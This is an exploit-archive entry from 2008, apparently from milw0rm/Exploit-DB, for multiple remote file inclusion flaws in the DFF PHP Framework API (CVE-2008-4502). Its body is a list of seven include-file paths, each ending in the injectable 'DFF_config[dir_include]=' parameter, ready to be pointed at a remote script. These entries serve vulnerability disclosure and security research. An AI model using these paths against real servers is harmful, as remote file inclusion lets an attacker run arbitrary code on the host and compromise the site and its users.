DFF PHP Framework API - 'Data Feed File' Remote File Inclusion

Author: GoLd_M
type: webapps
platform: php
port: 
date_added: 2008-10-07  
date_updated:   
verified: 1  
codes: OSVDB-48962;CVE-2008-4502;OSVDB-48961;OSVDB-48960;OSVDB-48959;OSVDB-48958;OSVDB-48957;OSVDB-48956  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 6700.txt  
# DFF PHP Framework API (Data Feed File) Multiple Inclusion Vulnerabilities
# Script :http://opensource.datafeedfile.com/download/DFF_PHP_FrameworkAPI-latest.zip
# Exploits :
#         /DFF_PHP_FrameworkAPI-latest/include/DFF_affiliate_client_API.php?DFF_config[dir_include]=
#         /DFF_PHP_FrameworkAPI-latest/include/DFF_featured_prdt.func.php?DFF_config[dir_include]=
#         /DFF_PHP_FrameworkAPI-latest/include/DFF_mer.func.php?DFF_config[dir_include]=
#         /DFF_PHP_FrameworkAPI-latest/include/DFF_mer_prdt.func.php?DFF_config[dir_include]=
#         /DFF_PHP_FrameworkAPI-latest/include/DFF_paging.func.php?DFF_config[dir_include]=
#         /DFF_PHP_FrameworkAPI-latest/include/DFF_rss.func.php?DFF_config[dir_include]=
#         /DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]=
# Tryag.cc/cc

# milw0rm.com [2008-10-08]